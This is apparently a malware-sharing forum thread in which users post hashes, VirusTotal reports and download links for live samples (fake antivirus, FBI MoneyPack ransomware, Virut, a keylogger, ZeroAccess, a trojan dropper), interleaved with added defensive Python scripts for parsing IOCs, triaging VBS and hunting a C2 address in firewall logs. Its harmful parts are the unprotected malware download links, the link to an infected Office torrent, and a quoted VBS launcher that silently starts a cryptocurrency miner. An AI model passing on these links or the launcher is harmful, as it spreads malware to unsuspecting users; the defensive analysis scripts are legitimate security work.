Malware Sample
Malware Sample #1
Here is the first submission.

This particular fake AV runs "Windows Custom Security".
VirusTotal:
SHA256: 700873063400fea27c2c4ccdf66d329a478d0fc8a2bad18a48de3019c0707544
File name: FAKEA-RM.00D
Detection ratio: 33 / 42
Analysis date: 2012-06-18 04:32:37 UTC ( 3 months, 1 week ago )

Download here:
http://www.filedropper.com/windowscustomsafety
or here:
http://www.filehosting.org/file/details/..._Safety.7z

Dropbox link:
http://dl.dropbox.com/u/2690780/Test1/Wi...0Safety.7z

The file is in a 7zip package with no password.

Please let me know which file hosting services you guys prefer and/or are better than the ones I provided.
(This post was last modified: 09-25-2012, 10:13 PM by 1nT0x!c@t3d.)


RE: Malware Sample #2
FBI MoneyPack variants
Scanned at virustotal.com
Sample 1
File: FBI.Moneypack[easymode].7z
SHA256: 601f0b9e412a17c693a2ab8d3a4a34a9cf72c9d4f4f55909adfd2fff1f5762a6
SHA1: afad0d6a6acab63c450e33419f4291aadf2dac25
MD5: 7479dbb508c6c96ae44892b9d0c3f6da
File size: 59.4 KB ( 60775 bytes )
File name: msiiexx.exe
File type: Win32 EXE
Detection ratio: 34 / 43
Analysis date: 2012-09-25 23:42:59 UTC ( 0 minutes ago )

Download:
https://multiupload.biz/taluszmf2z56/FBI...iz.7z.html


Second submission:
FBI.Moneypack_Trojan.Winlock.6412.7z
SHA256: 739ee618037525295ea79ac28c4a05e856f01265f1be5d8e2283a0c15415039d
SHA1: 86c189c09962b5d38e7deebf112c7ecdefaa5db4
MD5: c0fb09a30dc4873e1806bfd317984de1
File size: 207.4 KB ( 212335 bytes )
File name: C0FB09A30DC4873E1806BFD317984DE1
File type: Win32 EXE
Tags: peexe
Detection ratio: 32 / 41
Analysis date: 2012-09-15 01:33:09 UTC ( 1 week, 3 days ago )

Download:
https://multiupload.biz/vzdcy49ittig/FBI...iz.7z.html

No password protection.
(This post was last modified: 09-27-2012, 11:17 AM by Dismas.)


RE: Malware Sample #3
I'd totally ask you for a virus scan, but that'd be rather foolish of me.


Virut Samples #4
This pack is mostly Virut samples: 6 nasty infections with reports.
1.
SHA256: 3370da9f22ccddf5760d0f3121e1f04ca474f96d2ed1e8c6f4649579b875ddba
SHA1: 0dc326f35d4845b93b3cf84f729f156b2b675fe5
MD5: 7fbb667dc99fe958728da2e41fef3097
File size: 60.5 KB ( 61952 bytes )
File name: 7hyyhnwf.exe
File type: Win32 EXE
Detection ratio: 39 / 43
Analysis date: 2012-09-28 00:44:59 UTC ( 0 minutes ago )

https://www.virustotal.com/file/3370da9f...348793099/

2.
SHA256: 59c4b704b5cd1198a1f6072862a57771012844b01033024fd26b8ba0f26f1cc0
SHA1: 23b77bd92d9aa1e2bffbf160e6dbf85c227a95aa
MD5: 13b2e871bd7ee15f4078ce49819ad6fd
File size: 76.0 KB ( 77824 bytes )
File name: ChCfg.exe
File type: Win32 EXE
Detection ratio: 36 / 43
Analysis date: 2012-09-28 00:47:29 UTC ( 0 minutes ago )

https://www.virustotal.com/file/59c4b704...348793249/

3.
SHA256: e749cec198c519190b302dc8c12fb600b12039dcbadb7787ad0957df6727892f
SHA1: 7280e0537eec3ee2dda5e4bf6388d687fd0fa6dc
MD5: 72ff9b27d404bbf19c037074bbffee6e
File size: 74.8 KB ( 76564 bytes )
File name: ex3cv9vb.exe
File type: Win32 EXE
Detection ratio: 39 / 43
Analysis date: 2012-09-28 00:50:25 UTC ( 0 minutes ago )

https://www.virustotal.com/file/e749cec1...348793425/

4.
SHA256: 728414dc574a72f1e2986ad844996e81c9a633d2a4936fefd20b5b4d4da41dc8
SHA1: bc99f90656e6cee8d5afee885173897e7e50badb
MD5: 86beebf5f131cf54a6b939a14efb893a
File size: 67.0 KB ( 68608 bytes )
File name: f1ku.exe
File type: Win32 EXE
Detection ratio: 38 / 42
Analysis date: 2012-09-28 00:52:28 UTC ( 1 minute ago )

https://www.virustotal.com/file/728414dc...348793548/

5.
SHA256: 4dc2d07f5aed19c3c7deff2fbe50f5bb01fd80d7a3eeb25acd881def804c60fd
SHA1: 9631baa5c2e8544bed49c26f38fd71972b4d94eb
MD5: be7dcbd8c94da312986204957a93be61
File size: 128.5 KB ( 131584 bytes )
File name: 599E8A7E002F01A502C40287528D9100A7C10CFE.exe
File type: Win32 EXE
Detection ratio: 30 / 43
Analysis date: 2012-01-24 20:19:23 UTC ( 8 months, 1 week ago )

https://www.virustotal.com/file/4dc2d07f.../analysis/

6.
SHA256: c4d9284cdd05f66f8654f26b72bff52b8473d380a6cb84ee95990c899ec44e23
SHA1: 4d1728bc5c69f342f7cfb9dd813ed288cddf9d4a
MD5: f225e8d9294f57dd27dd5e777ac50012
File size: 63.0 KB ( 64516 bytes )
File name: v9mibx34.exe
File type: Win32 EXE
Detection ratio: 37 / 41
Analysis date: 2012-09-28 00:55:42 UTC ( 1 minute ago )

https://www.virustotal.com/file/c4d9284c...348793742/

Download link:
http://www.filehosting.org/file/details/...ections.7z

7zip file, no PW.

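The entries in this post and in the FBI MoneyPack post above all use the same VirusTotal summary layout (SHA256/SHA1/MD5, size in KB and bytes, detection ratio, analysis date). What follows is an added example, not code from the thread or from VirusTotal: a parser that turns that layout into IOC records, flags digests of the wrong length and KB/byte figures that disagree (both are common copy-paste errors in threads like this), and emits CSV for a blocklist or SIEM import. The names parse_vt_blocks and to_csv are hypothetical, and SAMPLE_POST is constructed by copying the first two Virut entries above.

```python
"""Parse VirusTotal-style summary blocks, as pasted in forum posts, into IOC records.

Added example (hypothetical helper names); SAMPLE_POST is constructed from two of
the Virut entries in the post above.
"""
import csv
import io
import re

SAMPLE_POST = """\
1.
SHA256: 3370da9f22ccddf5760d0f3121e1f04ca474f96d2ed1e8c6f4649579b875ddba
SHA1: 0dc326f35d4845b93b3cf84f729f156b2b675fe5
MD5: 7fbb667dc99fe958728da2e41fef3097
File size: 60.5 KB ( 61952 bytes )
File name: 7hyyhnwf.exe
File type: Win32 EXE
Detection ratio: 39 / 43
Analysis date: 2012-09-28 00:44:59 UTC ( 0 minutes ago )

2.
SHA256: 59c4b704b5cd1198a1f6072862a57771012844b01033024fd26b8ba0f26f1cc0
SHA1: 23b77bd92d9aa1e2bffbf160e6dbf85c227a95aa
MD5: 13b2e871bd7ee15f4078ce49819ad6fd
File size: 76.0 KB ( 77824 bytes )
File name: ChCfg.exe
File type: Win32 EXE
Detection ratio: 36 / 43
Analysis date: 2012-09-28 00:47:29 UTC ( 0 minutes ago )
"""

# Hex digest lengths; a digest of any other length is a transcription error, not a hash.
DIGEST_LEN = {"sha256": 64, "sha1": 40, "md5": 32}

FIELD_RE = re.compile(
    r"^(SHA256|SHA1|MD5|File size|File name|File type|Detection ratio|Analysis date):\s*(.*)$")
SIZE_RE = re.compile(r"^([\d.]+)\s*KB\s*\(\s*(\d+)\s*bytes\s*\)")
RATIO_RE = re.compile(r"^(\d+)\s*/\s*(\d+)")
CSV_FIELDS = ["sha256", "sha1", "md5", "file_name", "size_bytes",
              "detections", "engines", "analysis_date"]


def parse_vt_blocks(text):
    """Return one dict per block; a block begins at each 'SHA256:' line."""
    records, cur = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if not m:
            continue
        key, val = m.group(1), m.group(2).strip()
        if key == "SHA256":
            cur = {"problems": []}
            records.append(cur)
        if cur is None:
            continue  # field seen before any SHA256 line; nothing to attach it to
        if key in ("SHA256", "SHA1", "MD5"):
            k, digest = key.lower(), val.lower()
            cur[k] = digest
            if not re.fullmatch(r"[0-9a-f]{%d}" % DIGEST_LEN[k], digest):
                cur["problems"].append("bad %s digest" % k)
        elif key == "File size":
            s = SIZE_RE.match(val)
            if s:
                kb, nbytes = float(s.group(1)), int(s.group(2))
                cur["size_bytes"] = nbytes
                # The KB figure is bytes/1024 rounded to one decimal; more than 0.05 off is a typo.
                if abs(nbytes / 1024 - kb) > 0.06:
                    cur["problems"].append("size mismatch")
            else:
                cur["problems"].append("unparsed size")
        elif key == "Detection ratio":
            r = RATIO_RE.match(val)
            if r:
                cur["detections"], cur["engines"] = int(r.group(1)), int(r.group(2))
        elif key == "File name":
            cur["file_name"] = val
        elif key == "File type":
            cur["file_type"] = val
        elif key == "Analysis date":
            cur["analysis_date"] = val.split(" UTC")[0]
    return records


def to_csv(records):
    """Serialise records as CSV (one row per sample) for a blocklist or SIEM import."""
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=CSV_FIELDS, extrasaction="ignore", lineterminator="\n")
    w.writeheader()
    for rec in records:
        w.writerow(rec)
    return buf.getvalue()


if __name__ == "__main__":
    recs = parse_vt_blocks(SAMPLE_POST)
    for rec in recs:
        if rec["problems"]:
            print("WARNING", rec.get("file_name"), rec["problems"])
    print(to_csv(recs), end="")
```

Paste a whole post into SAMPLE_POST (or read it from a file) and the records with a non-empty "problems" list are the ones to re-check against VirusTotal before the hashes go into a blocklist; the per-record "problems" list is kept out of the CSV on purpose so it never ends up as an indicator.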

RE: Bitcoin Zombie #5
Here is the first wild sample I have seen of an infection turning your computer into a Bitcoin miner.

This torrent:
http://www.torrentfunk.com/torrent/48291...teflu.html
will install the MS Office 2k13 preview; however, it will also install a startup entry called "windowsexplorer.exe" aimed at a new directory:

C:\program files\windowsupdates\ or
C:\program files (x86)\windowsupdates\

With many VBS scripts and an executable "officestarter2013.exe", it will attempt to use up to 10 threads on your machine strictly for Bitcoin mining.

Here is a sample of the VBS code:
' Launcher script as dropped (comments added). Wscript.Shell.Run with
' intWindowStyle 0 starts the miner with no visible window, and
' bWaitOnReturn False returns immediately so the script does not block.
Set WshShell = CreateObject("Wscript.Shell")
MSG_String = "OfficeStarter2013.exe --url http://litecoinpool.org:9332/ --userpass rackz.2:2 --threads 10 --quiet"
Ret = WshShell.Run(MSG_String,0,False)

None of the files in question are keyloggers, as I first suspected. They pass all the VirusTotal scans;
as such I won't include the scan logs, since there aren't any for "officestarter2013.exe".

The MS Office 2k13 is, however, legit and will install. The keys provided won't work anymore, but the 29-day trial will. You can easily see the infected files by using 7zip to extract the "Microsoft Office 2013 Professional Plus x64.exe" or "Microsoft Office 2013 Professional Plus x86" to a new directory. You will then see a "windows updates.exe" which further extracts to the files in question.

Here is an upload:
http://www.filehosting.org/file/details/...sUpdate.7z

7zip file with no PW.
Use at your own risk.

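The launcher quoted in the post above is a one-line WScript.Shell Run call with the miner's pool, worker name and thread count sitting in plain text. Here is an added example, not code from the post or from the dropped files, of the static triage a responder would do on such scripts: it finds Run calls, resolves the command string whether it is a literal or a variable assigned earlier in the script, notes whether the window style is 0 (hidden), and pulls out the pool host and port, worker and thread count as indicators. The helper names (analyse_vbs and friends) are hypothetical, SAMPLE_VBS is a constructed copy of the snippet in the post, and the short option forms are the cpuminer-style aliases, included as an assumption so the same code covers other launchers.

```python
"""Static triage of a VBS launcher like the one in the post above.

Added example, not part of the post: analyse_vbs() finds WScript.Shell Run calls,
resolves the command string (literal or variable assigned earlier in the script),
and extracts miner indicators. Helper names are hypothetical; SAMPLE_VBS is a
constructed copy of the snippet quoted in the post.
"""
import re
import shlex
import sys
from urllib.parse import urlsplit

SAMPLE_VBS = '''Set WshShell = CreateObject("Wscript.Shell")
MSG_String = "OfficeStarter2013.exe --url http://litecoinpool.org:9332/ --userpass rackz.2:2 --threads 10 --quiet"
Ret = WshShell.Run(MSG_String,0,False)
'''

# name = "literal"   (VBS doubles a quote to embed one)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"]|"")*)"\s*$')
# obj.Run cmd, style   or   obj.Run(cmd, style, wait); cmd is a variable or a literal
RUN_RE = re.compile(r'\.Run\s*\(?\s*(\w+|"(?:[^"]|"")*")\s*(?:,\s*(\d+))?', re.I)
# cpuminer-style pool options, long and short forms (assumed aliases)
OPT_ALIASES = {"--url": "url", "-o": "url", "--userpass": "userpass", "-O": "userpass",
               "--threads": "threads", "-t": "threads"}


def _resolve(arg, strings):
    """First Run() argument -> literal string, or None if it cannot be resolved statically."""
    if arg.startswith('"'):
        return arg[1:-1].replace('""', '"')
    return strings.get(arg)


def _miner_opts(argv):
    """Collect recognised pool options from argv, accepting both '--url X' and '--url=X'."""
    opts = {}
    for i in range(1, len(argv)):
        name, _, inline = argv[i].strip('"').partition("=")
        key = OPT_ALIASES.get(name)
        if not key:
            continue
        if inline:
            opts[key] = inline
        elif i + 1 < len(argv):
            opts[key] = argv[i + 1].strip('"')
    return opts


def analyse_vbs(text):
    """Return a list of findings, one per Run() call whose command could be resolved."""
    strings, findings = {}, []
    for line in text.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            strings[m.group(1)] = m.group(2).replace('""', '"')
        for r in RUN_RE.finditer(line):
            cmd = _resolve(r.group(1), strings)
            if cmd is None:
                continue
            # posix=False keeps Windows backslashes; quotes are stripped per token below
            argv = shlex.split(cmd, posix=False)
            opts = _miner_opts(argv)
            url = urlsplit(opts["url"]) if "url" in opts else None
            threads = opts.get("threads", "")
            findings.append({
                "command": cmd,
                "hidden_window": r.group(2) == "0",   # intWindowStyle 0 = no window
                "binary": argv[0].strip('"') if argv else "",
                "pool_host": url.hostname if url else None,
                "pool_port": url.port if url else None,
                "worker": opts["userpass"].split(":", 1)[0] if "userpass" in opts else None,
                "threads": int(threads) if threads.isdigit() else None,
                "is_miner": "url" in opts and "userpass" in opts,
            })
    return findings


if __name__ == "__main__":
    src = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_VBS
    for f in analyse_vbs(src):
        print(f)
```

Run it as `python triage_vbs.py some_dropped.vbs`, or with no argument to see the finding for the quoted snippet. The pool host and port are the network indicator to hunt for in proxy or firewall logs, and "hidden_window" plus "is_miner" together are the signal that a Run call is a miner rather than an installer helper.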

Algerian Keylogger - Rootkit.ZeroAccess #6
-----Algerian Keylogger------
These samples will create outbound connections to the following IP:
http://en.utrace.de/ip-address/197.207.211.109

Here are the VT logs:

https://www.virustotal.com/file/2c5cfa14.../analysis/

Files are in the 7zip folder and, as always, are NOT password protected.

Proceed at your own risk.

http://www.filehosting.org/file/details/...tre.SCR.7z


--- Rootkit.ZeroAccess -----
One of the nastier pieces of malware out there.
MBAM identifies it as Rootkit.0Access.

Here are the VT logs (30 / 43):

https://www.virustotal.com/file/41bf3766.../analysis/

Download here:
http://www.filehosting.org/file/details/..._Access.7z

The file is in a 7zip container with NO password.
User discretion is advised.
(This post was last modified: 01-03-2013, 02:59 AM by 1nT0x!c@t3d.)

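The post above gives a single network indicator for the keylogger samples: outbound connections to 197.207.211.109. The following is an added example, not from the post, of turning that into a check against a Windows Firewall log (pfirewall.log, W3C format): the parser takes column order from the #Fields header rather than hard-coding it, and hits are split into outbound connections to the address (the behaviour the post describes) and inbound attempts from it, which mean something different during triage. The helper names are hypothetical and SAMPLE_LOG is constructed.

```python
"""Hunt for the IOC address from the post above in a Windows Firewall log.

Added example, not from the post: parse_pfirewall() reads the W3C-style pfirewall.log
format (column order taken from the #Fields header) and find_ioc_hits() separates
outbound connections to the IOC from inbound attempts coming from it. Helper names
are hypothetical and SAMPLE_LOG is constructed.
"""
import ipaddress
from collections import Counter

# The one address given in the post.
IOC_IPS = {ipaddress.ip_address("197.207.211.109")}

SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2012-11-27 19:51:03 ALLOW TCP 192.168.1.10 197.207.211.109 49731 80 0 - 0 0 0 - - - SEND
2012-11-27 19:51:04 ALLOW TCP 192.168.1.10 93.184.216.34 49732 443 0 - 0 0 0 - - - SEND
2012-11-27 19:51:09 ALLOW UDP 192.168.1.10 192.168.1.1 51023 53 0 - - - - - - - SEND
2012-11-27 19:52:41 DROP TCP 197.207.211.109 192.168.1.10 4444 445 52 S 3290152 0 8192 - - - RECEIVE
2012-11-27 19:53:00 ALLOW TCP 192.168.1.10 197.207.211.109 49740 443 0 - 0 0 0 - - - SEND
"""


def parse_pfirewall(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # truncated or malformed line; skip rather than misalign columns
        yield dict(zip(fields, parts))


def find_ioc_hits(text, iocs=IOC_IPS):
    """Return (outbound, inbound): SEND records to an IOC, RECEIVE records from one."""
    outbound, inbound = [], []
    for rec in parse_pfirewall(text):
        try:
            src = ipaddress.ip_address(rec["src-ip"])
            dst = ipaddress.ip_address(rec["dst-ip"])
        except ValueError:
            continue
        if rec["path"] == "SEND" and dst in iocs:
            outbound.append(rec)
        elif rec["path"] == "RECEIVE" and src in iocs:
            inbound.append(rec)
    return outbound, inbound


def summarise(hits):
    """Collapse hits to (src-ip, dst-ip, dst-port, action) with counts, for a triage table."""
    return Counter((h["src-ip"], h["dst-ip"], h["dst-port"], h["action"]) for h in hits)


if __name__ == "__main__":
    out, inn = find_ioc_hits(SAMPLE_LOG)
    for key, n in summarise(out).items():
        print("outbound", key, n)
    for key, n in summarise(inn).items():
        print("inbound", key, n)
```

Point it at %systemroot%\system32\LogFiles\Firewall\pfirewall.log (logging of allowed connections has to be switched on first; by default only drops are written) and the outbound ALLOW rows to the IOC are the ones that confirm the behaviour the post describes, with the source host and port telling you which machine to pull the sample from.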

RE: Malware Sample #7
(11-27-2012, 07:51 PM)fantac Wrote: I think I got this malware. Could someone help me remove it, please? :(

I can help you with this. Simply PM me with your Skype and I'll add you, then we can get on TV.


RE: Malware Sample #8
Can be found on almost every BH forum, but thanks for sharing anyway :blackhat:


(11-27-2012, 07:51 PM)fantac Wrote: I think I got this malware. Could someone help me remove it, please? :(

And what to say to that, lul


RE: Malware Sample #9
Win 7 Total Security + ZeroAccess

As of 01/15/13 none of the samples are identified by MBAM!
When I first uploaded these samples, VT had not seen them before, but correctly
identified them.

So here it is AF, a VT first just for you. :D

The three offenders in the 7zip are:

1. https://www.virustotal.com/file/6213ad5b.../analysis/

2. https://www.virustotal.com/file/cd4cd138.../analysis/

3. https://www.virustotal.com/file/2020357b.../analysis/

As always, the files are in an unprotected 7zip file,
no PW.
User discretion advised.

http://www.filehosting.org/file/details/...oAccess.7z


Xchrome Theme Changer #10
I was looking for a way to change the themes in Chrome when I came across this gem. My buddy is a Chrome fanboy and thought he could find a quick way to change the themes, and then sent me a link to this program. 3 out of the 4 files in question are heavily infected, while "xchrome.exe" checks out as safe from all sources; it is probably just heavily encrypted.

VT
1
https://www.virustotal.com/en/file/ca30c.../analysis/
2
https://www.virustotal.com/en/file/36b4b.../analysis/
3
https://www.virustotal.com/en/file/0eb4e.../analysis/
4
https://www.virustotal.com/en/file/aaa53.../analysis/




Files:
XChromeP3.Trojan-Dropper.Win32.Agent.7z
Download:
http://www.filehosting.org/file/details/...2.Agent.7z

Files are in a zip file container with NO PASSWORD.
Proceed at your own risk.
